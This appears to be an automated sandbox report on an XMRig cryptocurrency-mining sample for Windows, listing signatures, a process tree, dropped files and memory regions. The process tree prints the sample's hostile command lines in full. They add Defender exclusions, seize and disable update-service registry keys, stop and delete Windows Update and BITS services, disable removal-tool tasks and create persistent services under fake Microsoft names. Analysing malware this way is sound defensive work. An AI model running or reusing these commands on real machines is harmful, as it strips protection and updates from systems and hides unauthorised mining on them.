Analysis

  • max time kernel
    150s
  • max time network
    149s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20260513-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20260513-enlocale:en-usos:windows10-2004-x64systemwindows
  • submitted
    08/08/2026, 02:55

General

  • Target
    1e5be4fab2e11a5a450d10e056be635d6695e10ba02933db46f49d2631c7d910.exe
  • Size 5.0MB
  • Sample260808-det22agm2z
  • SHA256 1e5be4fab2e11a5a450d10e056be635d6695e10ba02933db46f49d2631c7d910
  • MD5 SHA1 SHA512 SSDEEP TLSH

Malware Config

Signatures

  • Family: xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Modifies security service 2 TTPs 5 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
  • XMRig Miner payload 12 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Using powershell.exe command.

  • Server Software Component: Terminal Services DLL 1 TTPs 4 IoCs
  • Sets service image path in registry 3 TTPs 5 IoCs

    This determines the executable launched when a service starts. It can be used to establish persistence.

  • Creates new service(s) 2 TTPs
  • Cryptocurrency Miner

    Makes network request to known mining pool URL.

  • Deletes itself 1 IoCs
  • Disables service(s) 3 TTPs
  • Executes dropped EXE 1 IoCs
  • Stops running service(s) 4 TTPs
  • Power Settings 1 TTPs 4 IoCs

    powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

  • Drops file in System32 directory 11 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Launches sc.exe 17 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Modifies data under HKEY_USERS 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: RenamesItself 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 15 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 55 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:3312
      • C:\Users\Admin\AppData\Local\Temp\1e5be4fab2e11a5a450d10e056be635d6695e10ba02933db46f49d2631c7d910.exe
        "C:\Users\Admin\AppData\Local\Temp\1e5be4fab2e11a5a450d10e056be635d6695e10ba02933db46f49d2631c7d910.exe"
        2⤵
        • Deletes itself
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: RenamesItself
        • Suspicious use of WriteProcessMemory
        PID:1948
        • C:\Windows\System32\sc.exe
          "C:\Windows\System32\sc.exe" delete "MicrosoftEdgeUpdateTaskMachine_3aa5"
          3⤵
          • Launches sc.exe
          PID:1396
        • C:\Windows\System32\sc.exe
          "C:\Windows\System32\sc.exe" create "MicrosoftEdgeUpdateTaskMachine_3aa5" binpath= "C:\ProgramData\Microsoft\Network\Diagnostics\73BF5F50\LockAppHost14a02b.exe" start= "auto"
          3⤵
          • Launches sc.exe
          PID:2432
        • C:\Windows\System32\sc.exe
          "C:\Windows\System32\sc.exe" start "MicrosoftEdgeUpdateTaskMachine_3aa5"
          3⤵
          • Launches sc.exe
          PID:3996
      • C:\Windows\System32\nslookup.exe
        "C:\Windows\System32\nslookup.exe"
        2⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Drops file in System32 directory
        • Suspicious use of SetThreadContext
        • Modifies data under HKEY_USERS
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3600
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData, $env:TEMP) -ExclusionExtension @('.exe', '.sys') -Force
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Drops file in System32 directory
          • Modifies data under HKEY_USERS
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2428
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $key='HKLM:\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc';$acl=Get-Acl $key;$admin=New-Object System.Security.Principal.NTAccount('BUILTIN','Administrators');$acl.SetOwner($admin);$rule=New-Object System.Security.AccessControl.RegistryAccessRule($admin,'FullControl','Allow');$acl.SetAccessRule($rule);Set-Acl $key $acl;Set-ItemProperty $key -Name 'Start' -Value 4 -Type DWord
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Drops file in System32 directory
          • Modifies data under HKEY_USERS
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4752
        • C:\Windows\System32\sc.exe
          "C:\Windows\System32\sc.exe" config WaaSMedicSvc start= disabled
          3⤵
          • Launches sc.exe
          PID:228
        • C:\Windows\System32\sc.exe
          "C:\Windows\System32\sc.exe" stop WaaSMedicSvc
          3⤵
          • Launches sc.exe
          PID:1936
        • C:\Windows\System32\sc.exe
          "C:\Windows\System32\sc.exe" config UsoSvc start= disabled
          3⤵
          • Launches sc.exe
          PID:4684
        • C:\Windows\System32\sc.exe
          "C:\Windows\System32\sc.exe" stop UsoSvc
          3⤵
          • Launches sc.exe
          PID:4880
        • C:\Windows\System32\reg.exe
          "C:\Windows\System32\reg.exe" copy "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" "HKLM\SYSTEM\CurrentControlSet\Services\exvyakkfgz" /s /f
          3⤵
          • Server Software Component: Terminal Services DLL
          • Sets service image path in registry
          PID:2952
        • C:\Windows\System32\reg.exe
          "C:\Windows\System32\reg.exe" delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
          3⤵
            PID:5044
          • C:\Windows\System32\sc.exe
            "C:\Windows\System32\sc.exe" config WaaSMedicSvc start= disabled
            3⤵
            • Launches sc.exe
            PID:3844
          • C:\Windows\System32\sc.exe
            "C:\Windows\System32\sc.exe" stop WaaSMedicSvc
            3⤵
            • Launches sc.exe
            PID:1620
          • C:\Windows\System32\reg.exe
            "C:\Windows\System32\reg.exe" copy "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" "HKLM\SYSTEM\CurrentControlSet\Services\tkvyuhxico" /s /f
            3⤵
            • Server Software Component: Terminal Services DLL
            • Sets service image path in registry
            PID:1132
          • C:\Windows\System32\reg.exe
            "C:\Windows\System32\reg.exe" delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
            3⤵
              PID:2572
            • C:\Windows\System32\sc.exe
              "C:\Windows\System32\sc.exe" config wuauserv start= disabled
              3⤵
              • Launches sc.exe
              PID:4292
            • C:\Windows\System32\sc.exe
              "C:\Windows\System32\sc.exe" stop wuauserv
              3⤵
              • Launches sc.exe
              PID:2312
            • C:\Windows\System32\reg.exe
              "C:\Windows\System32\reg.exe" copy "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" "HKLM\SYSTEM\CurrentControlSet\Services\futjtfynfv" /s /f
              3⤵
              • Server Software Component: Terminal Services DLL
              • Sets service image path in registry
              PID:3336
            • C:\Windows\System32\reg.exe
              "C:\Windows\System32\reg.exe" delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
              3⤵
              • Modifies security service
              PID:876
            • C:\Windows\System32\sc.exe
              "C:\Windows\System32\sc.exe" config BITS start= disabled
              3⤵
              • Launches sc.exe
              PID:2728
            • C:\Windows\System32\sc.exe
              "C:\Windows\System32\sc.exe" stop BITS
              3⤵
              • Launches sc.exe
              PID:3848
            • C:\Windows\System32\reg.exe
              "C:\Windows\System32\reg.exe" copy "HKLM\SYSTEM\CurrentControlSet\Services\BITS" "HKLM\SYSTEM\CurrentControlSet\Services\ugqxqfdnig" /s /f
              3⤵
              • Server Software Component: Terminal Services DLL
              • Sets service image path in registry
              PID:1068
            • C:\Windows\System32\reg.exe
              "C:\Windows\System32\reg.exe" delete "HKLM\SYSTEM\CurrentControlSet\Services\BITS" /f
              3⤵
                PID:1516
              • C:\Windows\System32\sc.exe
                "C:\Windows\System32\sc.exe" config dosvc start= disabled
                3⤵
                • Launches sc.exe
                PID:1708
              • C:\Windows\System32\sc.exe
                "C:\Windows\System32\sc.exe" stop dosvc
                3⤵
                • Launches sc.exe
                PID:1824
              • C:\Windows\System32\reg.exe
                "C:\Windows\System32\reg.exe" copy "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" "HKLM\SYSTEM\CurrentControlSet\Services\fvjhdiobto" /s /f
                3⤵
                • Sets service image path in registry
                PID:3792
              • C:\Windows\System32\reg.exe
                "C:\Windows\System32\reg.exe" delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
                3⤵
                  PID:3628
                • C:\Windows\System32\schtasks.exe
                  "C:\Windows\System32\schtasks.exe" /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /Disable
                  3⤵
                    PID:4280
                  • C:\Windows\System32\schtasks.exe
                    "C:\Windows\System32\schtasks.exe" /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /Disable
                    3⤵
                      PID:2456
                    • C:\Windows\System32\schtasks.exe
                      "C:\Windows\System32\schtasks.exe" /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /Disable
                      3⤵
                        PID:1380
                      • C:\Windows\System32\schtasks.exe
                        "C:\Windows\System32\schtasks.exe" /Change /TN "\Microsoft\Windows\UpdateOrchestrator\Schedule Scan" /Disable
                        3⤵
                          PID:1208
                        • C:\Windows\System32\schtasks.exe
                          "C:\Windows\System32\schtasks.exe" /Change /TN "\Microsoft\Windows\UpdateOrchestrator\Schedule Scan Static Task" /Disable
                          3⤵
                            PID:3816
                          • C:\Windows\System32\schtasks.exe
                            "C:\Windows\System32\schtasks.exe" /Change /TN "\Microsoft\Windows\UpdateOrchestrator\Schedule Work" /Disable
                            3⤵
                              PID:1328
                            • C:\Windows\System32\schtasks.exe
                              "C:\Windows\System32\schtasks.exe" /Change /TN "\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work" /Disable
                              3⤵
                                PID:3556
                              • C:\Windows\System32\schtasks.exe
                                "C:\Windows\System32\schtasks.exe" /Change /TN "\Microsoft\Windows\UpdateOrchestrator\USO_UxBroker" /Disable
                                3⤵
                                  PID:2196
                                • C:\Windows\System32\schtasks.exe
                                  "C:\Windows\System32\schtasks.exe" /Change /TN "\Microsoft\Windows\UpdateOrchestrator\Reboot_AC" /Disable
                                  3⤵
                                    PID:3996
                                  • C:\Windows\System32\schtasks.exe
                                    "C:\Windows\System32\schtasks.exe" /Change /TN "\Microsoft\Windows\UpdateOrchestrator\Reboot_Battery" /Disable
                                    3⤵
                                      PID:2056
                                    • C:\Windows\System32\schtasks.exe
                                      "C:\Windows\System32\schtasks.exe" /Change /TN "\Microsoft\Windows\WaaSMedic\PerformRemediation" /Disable
                                      3⤵
                                        PID:712
                                      • C:\Windows\System32\powercfg.exe
                                        "C:\Windows\System32\powercfg.exe" /x -hibernate-timeout-ac 0
                                        3⤵
                                        • Power Settings
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:4764
                                      • C:\Windows\System32\powercfg.exe
                                        "C:\Windows\System32\powercfg.exe" /x -hibernate-timeout-dc 0
                                        3⤵
                                        • Power Settings
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:1196
                                      • C:\Windows\System32\powercfg.exe
                                        "C:\Windows\System32\powercfg.exe" /x -standby-timeout-ac 0
                                        3⤵
                                        • Power Settings
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:1596
                                      • C:\Windows\System32\powercfg.exe
                                        "C:\Windows\System32\powercfg.exe" /x -standby-timeout-dc 0
                                        3⤵
                                        • Power Settings
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:540
                                      • C:\Windows\System32\schtasks.exe
                                        "C:\Windows\System32\schtasks.exe" /Change /TN "\Microsoft\Windows\MRT\MRT_HB" /Disable
                                        3⤵
                                          PID:4340
                                        • C:\Windows\System32\schtasks.exe
                                          "C:\Windows\System32\schtasks.exe" /Change /TN "\Microsoft\Windows Removal Tools\MRT_HB" /Disable
                                          3⤵
                                            PID:2012
                                          • C:\Windows\System32\sc.exe
                                            "C:\Windows\System32\sc.exe" delete "RasConnectionManager_9d4d"
                                            3⤵
                                            • Launches sc.exe
                                            PID:3392
                                          • C:\Windows\System32\sc.exe
                                            "C:\Windows\System32\sc.exe" create "RasConnectionManager_9d4d" binpath= "C:\ProgramDataMicrosoftWindowsSchCache\NetworkListService22e8.exe" start= "auto"
                                            3⤵
                                            • Launches sc.exe
                                            PID:2040
                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData, $env:TEMP) -ExclusionExtension @('.exe', '.sys') -Force
                                            3⤵
                                            • Command and Scripting Interpreter: PowerShell
                                            • Drops file in System32 directory
                                            • Modifies data under HKEY_USERS
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:2616
                                          • C:\Windows\System32\schtasks.exe
                                            "C:\Windows\System32\schtasks.exe" /Change /TN "\Microsoft\Windows\MRT\MRT_HB" /Disable
                                            3⤵
                                              PID:4680
                                            • C:\Windows\System32\schtasks.exe
                                              "C:\Windows\System32\schtasks.exe" /Change /TN "\Microsoft\Windows Removal Tools\MRT_HB" /Disable
                                              3⤵
                                                PID:2184
                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData, $env:TEMP) -ExclusionExtension @('.exe', '.sys') -Force
                                                3⤵
                                                • Command and Scripting Interpreter: PowerShell
                                                • Drops file in System32 directory
                                                • Modifies data under HKEY_USERS
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:2792
                                              • C:\Windows\System32\schtasks.exe
                                                "C:\Windows\System32\schtasks.exe" /Change /TN "\Microsoft\Windows\MRT\MRT_HB" /Disable
                                                3⤵
                                                  PID:4608
                                                • C:\Windows\System32\schtasks.exe
                                                  "C:\Windows\System32\schtasks.exe" /Change /TN "\Microsoft\Windows Removal Tools\MRT_HB" /Disable
                                                  3⤵
                                                    PID:556
                                                • C:\Windows\System32\svchost.exe
                                                  "C:\Windows\System32\svchost.exe"
                                                  2⤵
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  • Suspicious use of FindShellTrayWindow
                                                  PID:4856
                                                  • C:\Windows\System32\Conhost.exe
                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    3⤵
                                                      PID:4752
                                                • C:\ProgramData\Microsoft\Network\Diagnostics\73BF5F50\LockAppHost14a02b.exe
                                                  C:\ProgramData\Microsoft\Network\Diagnostics\73BF5F50\LockAppHost14a02b.exe
                                                  1⤵
                                                  • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                  • Executes dropped EXE
                                                  • Suspicious use of SetThreadContext
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  • Suspicious use of WriteProcessMemory
                                                  PID:1212

                                                Network

                                                      MITRE ATT&CK Enterprise v16

                                                      Replay Monitor

                                                      Loading Replay Monitor...

                                                      Downloads

                                                      LockAppHost14a02b.exe

                                                      • Path C:\ProgramData\Microsoft\Network\Diagnostics\73BF5F50\LockAppHost14a02b.exe
                                                      • Size 5.0MB
                                                      • SHA256 1e5be4fab2e11a5a450d10e056be635d6695e10ba02933db46f49d2631c7d910
                                                      • MD5 SHA1 SHA512 SSDEEP TLSH

                                                      __PSScriptPolicyTest_v30eantu.2tr.ps1

                                                      • Path C:\Windows\Temp\__PSScriptPolicyTest_v30eantu.2tr.ps1
                                                      • Size 60B
                                                      • SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
                                                      • MD5 SHA1 SHA512 TLSH

                                                      powershell.exe.log

                                                      • Path C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
                                                      • Size 4KB
                                                      • SHA256 e3274ce8296f2cd20e3189576fbadbfa0f1817cdf313487945c80e968589a495
                                                      • MD5 SHA1 SHA512 SSDEEP TLSH

                                                      StartupProfileData-NonInteractive

                                                      • Path C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                      • Size 1KB
                                                      • SHA256 1b89ecde3e8f38d2ade010b830e43316713440d2f81f1a3e833ce8a31c9239ca
                                                      • MD5 SHA1 SHA512 TLSH

                                                      StartupProfileData-NonInteractive

                                                      • Path C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                      • Size 1KB
                                                      • SHA256 97c6234c2c693ca1e662f9752c19b504e1b1b52d5d6562cb150bd585f6db0117
                                                      • MD5 SHA1 SHA512 TLSH

                                                      StartupProfileData-NonInteractive

                                                      • Path C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                      • Size 1KB
                                                      • SHA256 0fd68598598d1dfa246506196e6e0b46ee2b3b26a91c229ff9bb290c7f63d7c1
                                                      • MD5 SHA1 SHA512 TLSH

                                                      memory/1212-25-0x0000000140000000-0x00000001408FD000-memory.dmp

                                                      memory/1212-14-0x0000000140000000-0x00000001408FD000-memory.dmp

                                                      memory/1212-15-0x0000000140000000-0x00000001408FD000-memory.dmp

                                                      memory/1212-26-0x0000000140000000-0x00000001408FD000-memory.dmp

                                                      memory/1948-1-0x00007FF869DD0000-0x00007FF869DD2000-memory.dmp

                                                      memory/1948-0-0x0000000140239000-0x00000001403F0000-memory.dmp

                                                      memory/1948-2-0x0000000140000000-0x00000001408FD000-memory.dmp

                                                      memory/1948-5-0x0000000140000000-0x00000001408FD000-memory.dmp

                                                      memory/1948-10-0x0000000140239000-0x00000001403F0000-memory.dmp

                                                      memory/1948-8-0x0000000140000000-0x00000001408FD000-memory.dmp

                                                      memory/1948-9-0x0000000140000000-0x00000001408FD000-memory.dmp

                                                      memory/1948-6-0x00000000001E0000-0x00000000001E1000-memory.dmp

                                                      memory/2428-51-0x0000024427340000-0x0000024427348000-memory.dmp

                                                      memory/2428-52-0x0000024427370000-0x0000024427376000-memory.dmp

                                                      memory/2428-45-0x0000024427100000-0x000002442711C000-memory.dmp

                                                      memory/2428-46-0x0000024427120000-0x00000244271D5000-memory.dmp

                                                      memory/2428-47-0x00000244271E0000-0x00000244271EA000-memory.dmp

                                                      memory/2428-48-0x0000024427350000-0x000002442736C000-memory.dmp

                                                      memory/2428-49-0x0000024427330000-0x000002442733A000-memory.dmp

                                                      memory/2428-50-0x0000024427390000-0x00000244273AA000-memory.dmp

                                                      memory/2428-27-0x0000024424C10000-0x0000024424C20000-memory.dmp

                                                      memory/2428-37-0x00007FF40EA90000-0x00007FF40EAA0000-memory.dmp

                                                      memory/2428-53-0x0000024427380000-0x000002442738A000-memory.dmp

                                                      memory/2428-54-0x0000024424C10000-0x0000024424C20000-memory.dmp

                                                      memory/2428-36-0x0000024426DC0000-0x0000024426DE2000-memory.dmp

                                                      memory/2428-28-0x0000024424C10000-0x0000024424C20000-memory.dmp

                                                      memory/2616-125-0x0000019E4FF10000-0x0000019E4FFC5000-memory.dmp

                                                      memory/2792-142-0x000001D29A650000-0x000001D29A705000-memory.dmp

                                                      memory/3600-19-0x0000000140000000-0x0000000140231000-memory.dmp

                                                      memory/3600-24-0x0000020791960000-0x0000020791961000-memory.dmp

                                                      memory/4856-92-0x0000020000790000-0x00000200007B0000-memory.dmp

                                                      memory/4856-93-0x0000000140000000-0x000000014080D000-memory.dmp

                                                      memory/4856-94-0x0000000140000000-0x000000014080D000-memory.dmp

                                                      memory/4856-97-0x0000000140000000-0x000000014080D000-memory.dmp

                                                      memory/4856-96-0x0000000140000000-0x000000014080D000-memory.dmp

                                                      memory/4856-95-0x0000000140000000-0x000000014080D000-memory.dmp

                                                      memory/4856-98-0x0000000140000000-0x000000014080D000-memory.dmp

                                                      memory/4856-102-0x0000000140000000-0x000000014080D000-memory.dmp

                                                      memory/4856-104-0x0000000140000000-0x000000014080D000-memory.dmp

                                                      memory/4856-103-0x0000000140000000-0x000000014080D000-memory.dmp

                                                      memory/4856-106-0x0000000140000000-0x000000014080D000-memory.dmp

                                                      memory/4856-105-0x0000000140000000-0x000000014080D000-memory.dmp

                                                      memory/4856-91-0x0000000140000000-0x000000014080D000-memory.dmp

                                                      memory/4856-90-0x0000000140000000-0x000000014080D000-memory.dmp

                                                      memory/4856-89-0x0000000140000000-0x000000014080D000-memory.dmp

                                                      memory/4856-84-0x0000000140000000-0x000000014080D000-memory.dmp